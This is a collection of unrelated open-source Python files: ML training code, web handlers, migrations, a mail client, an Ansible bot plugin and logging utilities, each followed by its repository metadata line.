acts.append(id2act[id])
actions.append(acts)
directory = fn + "/attention"
if not os.path.exists(directory):
os.makedirs(directory)
with open(fn + '/output.txt', 'w') as f:
for i, (a, b, c, d, e) in enumerate(zip(test_X, test_Y, actions, attention, switch)):
ed = editdistance.eval(b, c)
wer = ed / float(len(b))
f.write(str(i) + '\t')
f.write(str(len(b)) + '\t')
f.write(str(len(c)) + '\t')
f.write(str(ed) + '\t')
f.write(str(wer))
f.write('\n')
f.write(' '.join(a))
f.write('\n')
f.write(' '.join(str(x[0]) for x in e))
f.write('\n')
f.write(' '.join(b))
f.write('\n')
f.write(' '.join(c))
f.write('\n\n')
visualization(i, a, b, c, d, e, directory)
def process(args):
# prepare data
dg = get_data_generator(args.data_name, args)
train_X, train_Y = dg.get_train_data()
test_X, test_Y = dg.get_test_data()
if args.use_start_symbol:
train_X = [['S'] + x for x in train_X]
test_X = [['S'] + x for x in test_X]
ori_test_X, ori_test_Y = test_X, test_Y
# Tokenize
tokenizer = Tokenizer(args)
samples, dicts, lengths, maxs = tokenizer.initialize(
train_X, train_Y, test_X, test_Y)
train_X, train_Y, test_X, test_Y = samples
voc, act = dicts
train_X_len, train_Y_len, test_X_len, test_Y_len = lengths
if args.remove_x_eos:
train_X_len = [x - 1 for x in train_X_len]
test_X_len = [x - 1 for x in test_X_len]
max_input, max_output = maxs
args.input_length = max_input
args.output_length = max_output
# prepare model
model = get_model(args.model_name, args)
model.initialize(len(voc) + 1, len(act) + 1)
model.train(train_X, train_Y, train_X_len, train_Y_len)
model.test(train_X, train_Y, train_X_len, train_Y_len, "Train w. noise", noise_weight=args.noise_weight)
model.test(train_X, train_Y, train_X_len, train_Y_len, "Train w.o. noise")
model.test(test_X, test_Y, test_X_len, test_Y_len, "Test w. noise", noise_weight=args.noise_weight)
prediction, attention, switch, sent_acc = model.test(test_X, test_Y, test_X_len, test_Y_len, "Test w.o. noise")
evaluation(ori_test_X, ori_test_Y, prediction, attention, switch, act, 'logs/' + args.experiment_id)
print("Final sentence accuracy:", str(100 * sent_acc) + '%')
def main(args):
seed = args.random_seed
random.seed(seed)
if args.random_random:
np.random.seed(random.randint(2, 1000))
else:
np.random.seed(seed)
# organizing parameters
if args.remove_noise:
args.noise_weight = 0.0
if args.function_embedding_size <= 0:
args.function_embedding_size = args.embedding_size
process(args)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Compositional Instructions.')
parser.add_argument('--experiment_id', type=str, default='default',
help='experiment ID')
parser.add_argument('--model_name', type=str, default='transformer',
help='model name')
parser.add_argument('--print_output', action='store_true', default=False,
help='Linear max.')
parser.add_argument('--simple_data', action='store_true', default=False,
help='use simple data.')
parser.add_argument('--random_seed', type=int, default=42,
help='random seed')
parser.add_argument('--learning_rate', type=float, default=0.3,
help='learning rate')
parser.add_argument('--batch_size', type=int, default=10,
help='batch_size')
parser.add_argument('--shuffle_batch', action='store_true', default=False,
help='shuffle batch.')
parser.add_argument('--random_batch', action='store_true', default=False,
help='random batch.')
parser.add_argument('--epochs', type=int, default=5000,
help='epochs')
parser.add_argument('--data_name', type=str, default='scan',
help='name of data set')
parser.add_argument('--train_file', type=str,
default='SCAN/add_prim_split/tasks_train_addprim_jump.txt',
help='train file name')
parser.add_argument('--test_file', type=str,
default='SCAN/add_prim_split/tasks_test_addprim_jump.txt',
help='test file name')
parser.add_argument('--switch_temperature', type=float, default=1.0,
help='switch temperature')
parser.add_argument('--attention_temperature', type=float, default=10.0,
help='attention temperature')
parser.add_argument('--num_units', type=int, default=16,
help='num units')
parser.add_argument('--bidirectional_encoder', action='store_true', default=False,
help='bidirectional encoder.')
parser.add_argument('--max_gradient_norm', type=float, default=-1.0,
help='max gradient norm')
parser.add_argument('--decay_steps', type=int, default=-1,
help='decay steps')
parser.add_argument('--use_input_length', action='store_true', default=False,
help='use input length.')
parser.add_argument('--use_embedding', action='store_true', default=False,
help='use embedding.')
parser.add_argument('--embedding_size', type=int, default=32,
help='embedding size')
parser.add_argument('--function_embedding_size', type=int, default=-1,
help='function embedding size')
parser.add_argument('--reg_coe', type=float, default=-1.0,
help='regularization coeficient')
parser.add_argument('--macro_switch_reg_coe', type=float, default=-1.0,
help='macro switch regularization coeficient')
parser.add_argument('--relu_switch', action='store_true', default=False,
help='relu switch')
parser.add_argument('--use_start_symbol', action='store_true', default=False,
help='use start symbol')
parser.add_argument('--content_noise', action='store_true', default=False,
help='add noise to content')
parser.add_argument('--content_noise_coe', type=float, default=-1.0,
help='noise regularization coeficient')
parser.add_argument('--sample_wise_content_noise', action='store_true', default=False,
help='sample-wise noise regularization')
parser.add_argument('--noise_weight', type=float, default=1.0,
help='noise weight')
parser.add_argument('--remove_noise', action='store_true', default=False,
help='remove noise')
parser.add_argument('--function_noise', action='store_true', default=False,
help='add noise to function')
parser.add_argument('--remove_x_eos', action='store_true', default=False,
help='remove x eos')
parser.add_argument('--masked_attention', action='store_true', default=False,
help='masked attention')
parser.add_argument('--remove_switch', action='store_true', default=False,
help='remove switch')
parser.add_argument('--use_entropy_reg', action='store_true', default=False,
help='use entropy reg')
parser.add_argument('--random_random', action='store_true', default=False,
help='random_random')
parser.add_argument('--single_representation', action='store_true', default=False,
help='single representation')
parser.add_argument('--use_decoder_input', action='store_true', default=False,
help='single representation')
parser.add_argument('--output_embedding_size', type=int, default=8,
help='output embedding size')
parser.add_argument('--use_l1_norm', action='store_true', default=False,
help='single representation')
parser.add_argument('--remove_prediction_bias', action='store_true', default=False,
help='remove prediction bias')
parser.add_argument('--clip_by_norm', action='store_true', default=False,
help='clip by norm instead of global norm.')
args = parser.parse_args()
main(args)
| yli1/CGPS | main.py | Python | apache-2.0 | 9,613 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from services.application import ApplicationService
from services.application_access import ApplicationAccessService
import tornado.web
from tornado import gen
import tornado.escape
import json
from util.rabbitmq import send_message
from stormed import Message
import settings
from views import AsyncBaseHandler
import time
class ApplicationRunHandler(AsyncBaseHandler):
s_application = ApplicationService()
@gen.coroutine
def _post_(self):
project_url = self.get_argument("project_url",None)
project_name = self.get_argument("project_name",None)
storage_path = self.get_argument("storage_path",None)
user_id = str(self.current_user.get("_id",None))
user_name = str(self.current_user.get("name",None))
create_time = time.time()
        # Database operations
insertData = {}
insertData["project_url"] = project_url
insertData["project_name"] = project_name
insertData["storage_path"] = storage_path
insertData["user_id"] = user_id
insertData["status"] = 'created'
insertData["logs"] = [{"create_time":create_time,"info":{"stream":"started run application:"+project_name},"user_id":user_id}]
result = yield self.s_application.insert_application(insertData)
        # Add the task to the message queue
msg = Message( json.dumps({
"application_id":result["_id"],
"project_url":project_url,
"project_name":project_name,
"storage_path":storage_path,
"user_id":user_id,
"user_name":user_name,
'app_count':1,
"reply_to":'service_logs'
}))
send_message(msg,settings.RUN_APPLICATION_EXCHANGE,settings.RUN_APPLICATION_ROUTING)
if result is None:
self.render_error(error_code=404,msg="not data")
else:
insertData["_id"] = result["_id"]
self.write_result(data=insertData)
class ApplicationInfoHandler(AsyncBaseHandler):
s_application = ApplicationService()
@gen.coroutine
def _post_(self):
application_id = self.get_argument("application_id",None)
app = yield self.s_application.find_one(application_id)
app["_id"] = str(app["_id"])
if app is None:
self.render_error(error_code=404,msg="not data")
else:
self.write_result(data=app)
class ApplicationsHandler(AsyncBaseHandler):
s_application = ApplicationService()
fields={
"project_url":True,
"project_name":True,
"app_name":True,
"user_id":True,
"user_name":True,
"status":True,
"logs":True,
"update_time":True,
'create_time':True,
"run_host":True,
"inspect_container":True,
"address_prefix":True,
"singleton":True
}
@gen.coroutine
def _get_(self):
spec_type = self.get_argument("spec_type","app_name")
spec_text = self.get_argument("spec_text","")
page_index =int(self.get_argument("page_index",0))
page_size =int(self.get_argument("page_size",20))
spec ={}
spec[spec_type]={ '$regex' : spec_text}
spec["user_id"] = str(self.current_user.get("_id",None))
applications =yield self.s_application.get_appliactions(spec,fields=self.fields,page_index=page_index,page_size=page_size)
if not applications:
self.render_error(error_code=404,msg="not data")
else:
self.write_result(data=applications)
class ApplicationAccessHandler(AsyncBaseHandler):
s_application = ApplicationService()
s_application_access = ApplicationAccessService()
@gen.coroutine
def _get_(self):
access_id = self.get_argument("access_id",None)
access_info = yield self.s_application_access.find_one(access_id)
if access_info is None:
self.render_error(error_code=404,msg="not data")
else:
self.write_result(data=access_info)
@gen.coroutine
def _post_(self):
access_type = self.get_argument("type",None)
application_id = self.get_argument("id",None)
access_content = self.get_argument("content","")
container_info =yield self.s_application.find_one(application_id)
if container_info is None:
container_info = {}
        # Fetched from the database; be sure not to expose this publicly
container_host = container_info.get("run_host",None)
container_name = container_info.get("app_name",None)
if container_host is None or container_name is None:
self.render_error(error_code=404,msg="not success")
user_id = str(self.current_user.get("_id",None))
user_name = str(self.current_user.get("name",None))
create_time = time.time()
        # Database operations
accessData = {}
accessData["access_type"] = access_type
accessData["application_id"] = application_id
accessData["container_name"] = container_name
accessData["container_host"] = container_host
accessData["access_content"] = access_content
accessData["user_id"] = user_id
accessData["status"] = 'start'
accessData["logs"] = [
{
"create_time":create_time,
"info":"started access application:"+application_id+",it is hosted in "+container_host,
"user_id":user_id
}
]
result= yield self.s_application_access.access_application(accessData)
        # Add the task to the message queue
msg = Message( json.dumps({
"access_id":result,
"access_type":access_type,
"access_content":access_content,
"application_id":application_id,
"container_host":container_host,
"container_name":container_name,
"user_id":user_id,
"user_name":user_name,
"reply_to":'access_logs'
}))
send_message(msg,settings.ACCESS_APPLICATION_EXCHANGE,settings.ACCESS_APPLICATION_ROUTING+"."+container_host)
if result is None:
self.render_error(error_code=404,msg="not data")
else:
accessData["_id"] = str(result)
self.write_result(data=accessData)
| liuhong1happy/DockerConsoleApp | views/application.py | Python | apache-2.0 | 6,294 |
#!/usr/bin/python
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example creates new activities.
To determine which activities groups exist, run get_all_activities.py.
Tags: ActivityService.createActivities
"""
__author__ = 'Vincent Tsao'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
from adspygoogle.common import Utils
# Set the ID of the activity group this activity is associated with.
ACTIVITY_GROUP_ID = 'INSERT_ACTIVITY_GROUP_ID_HERE'
def main(client, activity_group_id):
# Initialize appropriate service.
activity_service = client.GetService('ActivityService', version='v201311')
# Create a daily visits activity.
daily_visits_activity = {
'name': 'Activity #%s' % Utils.GetUniqueName(),
'activityGroupId': activity_group_id,
'type': 'DAILY_VISITS'
}
# Create a custom activity.
custom_activity = {
'name': 'Activity #%s' % Utils.GetUniqueName(),
'activityGroupId': activity_group_id,
'type': 'CUSTOM'
}
# Create the activities on the server.
activities = activity_service.CreateActivities([
daily_visits_activity, custom_activity])
# Display results.
for activity in activities:
print ('An activity with ID \'%s\', name \'%s\', and type \'%s\' was '
'created.' % (activity['id'], activity['name'], activity['type']))
if __name__ == '__main__':
# Initialize client object.
dfp_client = DfpClient(path=os.path.join('..', '..', '..', '..', '..'))
main(dfp_client, ACTIVITY_GROUP_ID)
| caioserra/apiAdwords | examples/adspygoogle/dfp/v201311/activity_service/create_activities.py | Python | apache-2.0 | 2,305 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import storages.backends.s3boto
class Migration(migrations.Migration):
dependencies = [
('categories', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='category',
name='thumbnail',
field=models.FileField(storage=storages.backends.s3boto.S3BotoStorage(location=b'media'), null=True, upload_to=b'uploads/categories/thumbnails', blank=True),
),
]
| lincolnloop/django-categories | categories/migrations/0002_thumbnail_compat.py | Python | apache-2.0 | 550 |
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import settings
class MailClient(object):
def __init__(self):
'''
Creates a new client
'''
def smtp_login(self):
'''
Logs into the smtp server
Returns the sender's credentials
'''
self.client = smtplib.SMTP(**settings.SMTP)
self.sender = settings.SENDER
self.client.ehlo()
self.client.starttls()
self.client.ehlo()
self.client.login(self.sender, settings.PASSWORD)
return self.sender
def send(self, recipient, body, subject):
'''
Sends an email
        recipient = A User object from the User table
body = The body of the email
subject = The subject of the email
All emails are sent from the address defined in settings.SENDER
'''
email = MIMEMultipart('alternative')
email['From'] = settings.SENDER
email['To'] = recipient.email
email['Subject'] = subject
email.attach(MIMEText(body.encode('UTF-8'), 'html'))
if settings.SEND_EMAIL:
sender = self.smtp_login()
self.client.sendmail(sender, recipient.email, email.as_string())
return email.as_string().split('\n')
class Subjects:
DIGEST = '[Teachboost] Task Digest'
HELP = '[Teachboost] Message Help'
RESPONSE = '[Teachboost] Manager Response'
SUBSCRIPTIONS = '[Teachboost] Your Subscriptions'
REMINDER = '[Teachboost] Friendly Reminder'
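# Illustrative usage sketch (not part of the original module). `recipient` is
# assumed to be a User object exposing an `email` attribute, as expected by
# MailClient.send(); the HTML body below is made up for the example.
#
#   client = MailClient()
#   lines = client.send(recipient, body='<p>Your tasks for today</p>',
#                       subject=Subjects.DIGEST)
#
# When settings.SEND_EMAIL is false, send() only builds the MIME message and
# returns its text split into lines, without contacting the SMTP server.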
| TeachBoost/ansible | library/mailclient.py | Python | mit | 1,568 |
#!/usr/bin/env python
import copy
import json
import os
def get_collection_facts(iw, component_matcher, meta):
# Skip redirection of backports or <2.10 issues ...
is_backport = False
if isinstance(meta.get('is_backport'), bool):
is_backport = meta['is_backport']
else:
'''
if iw.is_issue():
avparts = meta['ansible_version'].split('.')
major = int(avparts[0])
try:
minor = int(avparts[1])
except:
minor = 0
if major < 2 or (major == 2 and minor < 10):
is_backport = True
else:
is_backport = False
else:
is_backport = iw.pullrequest.base.ref != u'devel'
'''
if not iw.is_issue():
is_backport = iw.pullrequest.base.ref != u'devel'
cfacts = {
'is_collection': False,
# notification about collections and closure ...
'needs_collection_boilerplate': False,
# close it ...
'needs_collection_redirect': False,
'collection_redirects': [],
'collection_filemap': {},
'collection_filemap_full': {},
'collection_file_matches': {},
'collection_fqcn_label_remove': set(),
}
cmap = {}
for cm in meta.get(u'component_matches', []):
if cm.get('repo_filename'):
cmap[cm['repo_filename']] = None
fqcns = set()
for key in cmap.keys():
if key in iw.renamed_files.values():
continue
if key in iw.renamed_files:
continue
if component_matcher.gitrepo.exists(key):
continue
cmap[key] = component_matcher.search_ecosystem(key)
if cmap[key]:
for match in cmap[key]:
if match.startswith('collection:'):
fqcns.add(match.split(':')[1])
# do not redirect things that still exist
has_core_files = False
for key in cmap.keys():
if component_matcher.gitrepo.exists(key):
has_core_files = True
break
cfacts['collection_filemap'] = copy.deepcopy(cmap)
cfacts['collection_redirects'] = list(fqcns)
cfacts['collection_fqcns'] = list(fqcns)
if fqcns:
cfacts['is_collection'] = True
# make urls for the bot comment
for k,v in cmap.items():
if v is None:
continue
for idi,item in enumerate(v):
parts = item.split(':')
cmap[k][idi] = k + ' -> ' + 'https://galaxy.ansible.com/' + parts[1].replace('.', '/')
cfacts['collection_file_matches'] = copy.deepcopy(cmap)
# should this be forwarded off to a collection repo?
if fqcns and not has_core_files and (not list([x for x in cmap.values() if not x])) and not is_backport:
cfacts['needs_collection_redirect'] = True
cfacts['component_support'] = ['community']
if not iw.history.last_date_for_boilerplate('collection_migration'):
cfacts['needs_collection_boilerplate'] = True
# loose matching for misc files ...
if not is_backport and fqcns and 'changelog' in ''.join(cmap.keys()):
missing = set()
for k,v in cmap.items():
if not k.startswith('changelogs/') and not k.startswith('test/units/') and not v:
missing.add(k)
if not missing:
cfacts['needs_collection_redirect'] = True
cfacts['component_support'] = ['community']
if not iw.history.last_date_for_boilerplate('collection_migration'):
cfacts['needs_collection_boilerplate'] = True
# allow users to override the redirect
cstatus = iw.history.command_status('needs_collection_redirect')
if cstatus is False:
cfacts['needs_collection_redirect'] = False
cfacts['needs_collection_boilerplate'] = False
# clean up incorrect labels ...
for label in iw.labels:
if label.startswith('collection:'):
fqcn = label.split(':')[1]
if fqcn not in fqcns:
cfacts['collection_fqcn_label_remove'].add(fqcn)
cfacts['collection_fqcn_label_remove'] = list(cfacts['collection_fqcn_label_remove'])
#import epdb; epdb.st()
return cfacts
| jctanner/ansibullbot | ansibullbot/triagers/plugins/collection_facts.py | Python | gpl-3.0 | 4,249 |
from __future__ import unicode_literals
import sys
import logging
from modularodm import Q
from modularodm import exceptions
from website.app import init_app
from scripts import utils as script_utils
from framework.transactions.context import TokuTransaction
from framework.guid.model import Guid
from website.files import models
from addons.box.model import BoxFile
from addons.s3.model import S3GuidFile
from addons.dropbox.model import DropboxFile
from addons.github.model import GithubGuidFile
from addons.dataverse.model import DataverseFile
from addons.figshare.model import FigShareGuidFile
from addons.osfstorage.model import OsfStorageGuidFile
from addons.googledrive.model import GoogleDriveGuidFile
logger = logging.getLogger(__name__)
def paginated(model, query=None, increment=200):
last_id = ''
pages = (model.find(query).count() / increment) + 1
for i in xrange(pages):
q = Q('_id', 'gt', last_id)
if query:
q &= query
page = list(model.find(q).limit(increment))
for item in page:
yield item
if page:
last_id = item._id
def do_migration():
logger.info('Migrating OsfStorage Guids')
migrate_osfstorage_guids()
logger.info('Migrating Box Guids')
migrate_guids(BoxFile, 'box')
logger.info('Migrating S3 Guids')
migrate_guids(S3GuidFile, 's3')
logger.info('Migrating Dropbox Guids')
migrate_guids(DropboxFile, 'dropbox')
logger.info('Migrating Github Guids')
migrate_guids(GithubGuidFile, 'github')
logger.info('Migrating Dataverse Guids')
migrate_guids(DataverseFile, 'dataverse')
logger.info('Migrating figshare Guids')
migrate_guids(FigShareGuidFile, 'figshare')
logger.info('Migrating GoogleDrive Guids')
migrate_guids(GoogleDriveGuidFile, 'googledrive')
def migrate_osfstorage_guids():
for guid in paginated(OsfStorageGuidFile):
if '{{' in guid.waterbutler_path:
logger.warning('OsfStorageGuidFile {} ({}) looks like a google bot link; skipping'.format(guid._id, guid.waterbutler_path.strip('/')))
continue
referent = models.StoredFileNode.load(guid.waterbutler_path.strip('/'))
if referent is None:
logger.warning('OsfStorageGuidFile {} ({}) resolved to None; skipping'.format(guid._id, guid.waterbutler_path.strip('/')))
continue
logger.debug('Migrating guid {}'.format(guid._id))
actual_guid = Guid.load(guid._id)
assert actual_guid is not None
actual_guid.referent = referent
actual_guid.save()
# try:
# assert actual_guid._id == referent.get_guid()._id
# except exceptions.MultipleResultsFound:
# logger.warning('FileNode {!r} has muliple guids referring to it.'.format(referent.wrapped()))
def migrate_guids(guid_type, provider):
cls = models.FileNode.resolve_class(provider, models.FileNode.FILE)
for guid in paginated(guid_type):
# Note: No metadata is populated here
# It will be populated whenever this guid is next viewed
if guid.node is None:
logger.warning('{}({})\'s node is None; skipping'.format(guid_type, guid._id))
continue
if guid.waterbutler_path in ('/{{ revision.osfDownloadUrl }}', '/{{ currentVersion().osfDownloadUrl }}', '/{{ currentVersion().osfDownloadUrl }}', '/{{ node.urls.files }}', '/{{ revision.extra.user.url }}'):
logger.warning('{}({})\'s is a googlebot path; skipping'.format(guid_type, guid._id))
continue
logger.debug('Migrating guid {} ({})'.format(guid._id, guid.waterbutler_path))
try:
file_node = cls(
node=guid.node,
path=guid.waterbutler_path,
name=guid.waterbutler_path,
materialized_path=guid.waterbutler_path,
)
file_node.save()
except exceptions.KeyExistsException:
file_node = cls.find_one(
Q('node', 'eq', guid.node) &
Q('path', 'eq', guid.waterbutler_path)
)
logger.warning('{!r}({}) has multiple guids'.format(file_node.wrapped(), guid._id))
actual_guid = Guid.load(guid._id)
actual_guid.referent = file_node
actual_guid.save()
def main(dry=True):
init_app(set_backends=True, routes=False) # Sets the storage backends on all models
with TokuTransaction():
do_migration()
if dry:
raise Exception('Abort Transaction - Dry Run')
if __name__ == '__main__':
dry = 'dry' in sys.argv
if not dry:
script_utils.add_file_logger(logger, __file__)
main(dry=dry)
| monikagrabowska/osf.io | scripts/migrate_file_guids.py | Python | apache-2.0 | 4,713 |
from model.account import Account, AccountAPIKey, AccountUser
from model.admin import Admin
from model.application import \
Application, \
ApplicationRoute, ApplicationTemplate, ApplicationStaticFile, \
ApplicationStaticContent
from model.general import Plan
| glennyonemitsu/MarkupHiveServer | src/model/__init__.py | Python | mit | 271 |
# Assignment Collector/Grader - a Django app for collecting and grading code
# Copyright (C) 2010,2011 Anthony Rossi <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls.defaults import *
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Example:
# (r'^AssignmentCollectorGrader/', include('AssignmentCollectorGrader.foo.urls')),
# Uncomment the admin/doc line below and add 'django.contrib.admindocs'
# to INSTALLED_APPS to enable admin documentation:
# (r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
(r'^admin/', include(admin.site.urls)),
(r'^', include('collector.urls')),
)
| rossica/assignmentcollectorgrader | urls.py | Python | agpl-3.0 | 1,480 |
# Copyright (c) 2015 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import eventlet
import murano.dsl.helpers as helpers
import murano.dsl.murano_class as murano_class
import murano.dsl.murano_object as murano_object
import murano.openstack.common.log as logging
LOG = logging.getLogger(__name__)
class MistralError(Exception):
pass
@murano_class.classname('io.murano.system.MistralClient')
class MistralClient(murano_object.MuranoObject):
def initialize(self, _context):
self._clients = helpers.get_environment(_context).clients
def upload(self, _context, definition):
mistral_client = self._clients.get_mistral_client(_context)
mistral_client.workflows.update(definition)
def run(self, _context, name, timeout=600, inputs=None, params=None):
mistral_client = self._clients.get_mistral_client(_context)
execution = mistral_client.executions.create(workflow_name=name,
workflow_input=inputs,
params=params)
# For the fire and forget functionality - when we do not want to wait
# for the result of the run.
if timeout == 0:
return execution.id
state = execution.state
try:
# While the workflow is running we continue to wait until timeout.
with eventlet.timeout.Timeout(timeout):
while state not in ('ERROR', 'SUCCESS'):
eventlet.sleep(2)
execution = mistral_client.executions.get(execution.id)
state = execution.state
except eventlet.timeout.Timeout:
error_message = (
'Mistral run timed out. Execution id: {0}.').format(
execution.id)
raise MistralError(error_message)
if state == 'ERROR':
error_message = ('Mistral execution completed with ERROR.'
' Execution id: {0}. Output: {1}').format(
execution.id, execution.output)
raise MistralError(error_message)
# Load the JSON we got from Mistral client to dictionary.
output = json.loads(execution.output)
# Clean the returned dictionary from unnecessary data.
# We want to keep only flow level outputs.
output.pop('openstack', None)
output.pop('__execution', None)
output.pop('task', None)
return output
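# Illustrative usage sketch from the MuranoPL side (hedged: the namespace alias and
# argument names below are assumptions for illustration, not taken from this module):
#
#     $client: new(sys:MistralClient)
#     $client.upload(definition => $workflowYaml)
#     $output: $client.run(name => 'deploy_instance', timeout => 600,
#                          inputs => {'flavor' => 'm1.small'})
#
# Passing timeout => 0 returns the Mistral execution id immediately ("fire and
# forget"); otherwise run() polls until SUCCESS/ERROR and returns the flow-level
# outputs as a dictionary.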
| chenyujie/hybrid-murano | murano/engine/system/mistralclient.py | Python | apache-2.0 | 3,020 |
import re
def index(i,j,k):
'''
Fargo3d index calculator.
    Input: Strings i,j,k, with the value of the desired index in each direction.
    Output: The monodimensional fargo3d index.
'''
value = ''
print i,j,k
#Trivial option
if i == 'i' and j == 'j' and k == 'k':
value += 'l'
return value
    if i == 'i':
        value += 'l'
x = re.match("\w([+-])(\d+)?",i)
y = re.match("\w([+-])(\d+)?",j)
z = re.match("\w([+-])(\d+)?",k)
if x != None:
if int(x.group(2)) >= 2:
print '\nError! The allowed displacement in i direction is up to +/- 1\n'
return
if x.group(1) == '+':
value += 'lxp'
if x.group(1) == '-':
value += 'lxm'
if y != None:
if(y.group(2) == '1'):
value += y.group(1) + 'Nx'
else:
value += y.group(1) + y.group(2) + '*Nx'
if z != None:
if(z.group(2) == '1'):
value += z.group(1) + 'Stride'
else:
value += z.group(1) + z.group(2) + '*Stride'
return value
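# Illustrative calls (hypothetical; expected outputs assume the standard FARGO3D
# index macros l, lxp, lxm, Nx and Stride):
#
#     index('i',   'j',   'k')    # -> 'l'
#     index('i+1', 'j',   'k')    # -> 'lxp'
#     index('i',   'j+1', 'k')    # -> 'l+Nx'
#     index('i',   'j',   'k-2')  # -> 'l-2*Stride'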
| adamdempsey90/fargo3d | utils/python/indices.py | Python | gpl-3.0 | 1,131 |
import logging
import sys
import re
import time
import datetime
debug, error, warning, info, success = (None, None, None, None, None)
def dieOnError(err, msg):
if err:
error("%s", msg)
sys.exit(1)
class LogFormatter(logging.Formatter):
def __init__(self, fmtstr):
self.fmtstr = fmtstr
self.COLOR_RESET = "\033[m" if sys.stdout.isatty() else ""
self.LEVEL_COLORS = { logging.WARNING: "\033[4;33m",
logging.ERROR: "\033[4;31m",
logging.CRITICAL: "\033[1;37;41m",
logging.SUCCESS: "\033[1;32m" } if sys.stdout.isatty() else {}
def format(self, record):
record.msg = record.msg % record.args
if record.levelno == logging.BANNER and sys.stdout.isatty():
lines = record.msg.split("\n")
return "\n\033[1;34m==>\033[m \033[1m%s\033[m" % lines[0] + \
"".join("\n \033[1m%s\033[m" % x for x in lines[1:])
elif record.levelno == logging.INFO or record.levelno == logging.BANNER:
return record.msg
return "\n".join(self.fmtstr % {
"asctime": datetime.datetime.now().strftime("%Y-%m-%d@%H:%M:%S"),
"levelname": (self.LEVEL_COLORS.get(record.levelno, self.COLOR_RESET) +
record.levelname + self.COLOR_RESET),
"message": x,
} for x in record.msg.split("\n"))
class ProgressPrint:
def __init__(self, begin_msg=""):
self.count = -1
self.lasttime = 0
self.STAGES = [ ".", "..", "...", "....", ".....", "....", "...", ".." ]
self.begin_msg = begin_msg
self.percent = -1
def __call__(self, txt, *args):
txt %= args
if time.time()-self.lasttime < 0.5:
return
if self.count == -1 and self.begin_msg:
sys.stderr.write("\033[1;35m==>\033[m "+self.begin_msg)
self.erase()
m = re.search("((^|[^0-9])([0-9]{1,2})%|\[([0-9]+)/([0-9]+)\])", txt)
if m:
if m.group(3) is not None:
self.percent = int(m.group(3))
else:
num = int(m.group(4))
den = int(m.group(5))
if num >= 0 and den > 0:
self.percent = 100 * num / den
if self.percent > -1:
sys.stderr.write(" [%2d%%] " % self.percent)
self.count = (self.count+1) % len(self.STAGES)
sys.stderr.write(self.STAGES[self.count])
self.lasttime = time.time()
def erase(self):
nerase = len(self.STAGES[self.count]) if self.count > -1 else 0
if self.percent > -1:
nerase = nerase + 7
sys.stderr.write("\b"*nerase+" "*nerase+"\b"*nerase)
def end(self, msg="", error=False):
if self.count == -1:
return
self.erase()
if msg:
sys.stderr.write(": %s%s\033[m" % ("\033[31m" if error else "\033[32m", msg))
sys.stderr.write("\n")
# Add loglevel BANNER (same as INFO but with more emphasis on ttys)
logging.BANNER = 25
logging.addLevelName(logging.BANNER, "BANNER")
def log_banner(self, message, *args, **kws):
if self.isEnabledFor(logging.BANNER):
self._log(logging.BANNER, message, args, **kws)
logging.Logger.banner = log_banner
# Add loglevel SUCCESS (same as ERROR, but green)
logging.SUCCESS = 45
logging.addLevelName(logging.SUCCESS, "SUCCESS")
def log_success(self, message, *args, **kws):
if self.isEnabledFor(logging.SUCCESS):
self._log(logging.SUCCESS, message, args, **kws)
logging.Logger.success = log_success
logger = logging.getLogger('alibuild')
logger_handler = logging.StreamHandler()
logger.addHandler(logger_handler)
logger_handler.setFormatter(LogFormatter("%(levelname)s: %(message)s"))
debug = logger.debug
error = logger.error
warning = logger.warning
info = logger.info
banner = logger.banner
success = logger.success
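# Illustrative usage from another module (a hedged sketch; the messages are made up):
#
#     from alibuild_helpers.log import banner, info, ProgressPrint
#
#     banner("Building zlib")                 # emphasised "==>" line on a tty
#     progress = ProgressPrint("Compiling")
#     progress("[3/120] CXX foo.o")           # "[n/m]" or "NN%" updates the gauge
#     progress.end("ok")
#     info("done")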
| alisw/alibuild | alibuild_helpers/log.py | Python | gpl-3.0 | 3,652 |
import datetime
import time
import os, sys
import re
import urllib
from django.template import RequestContext
from django.db import models
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.conf import settings
from django.db.models import Q
from django.core.mail import send_mail
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
import tagging
import hashlib
from codewiki import vc
from codewiki import util
from frontend.models import UserProfile
import textile # yuk
import creoleparser # creoleparser.text2html(cdesc); method may include pre and post processing of text to handle links and paramstrings encoding nicely
try:
import json
except:
import simplejson as json
LANGUAGES_DICT = {
'python' : 'Python',
'php' : 'PHP',
'ruby' : 'Ruby',
'html' : 'HTML',
'javascript' : 'Javascript',
#'css' : 'CSS',
#'wikicreole' : 'Wikicreole',
}
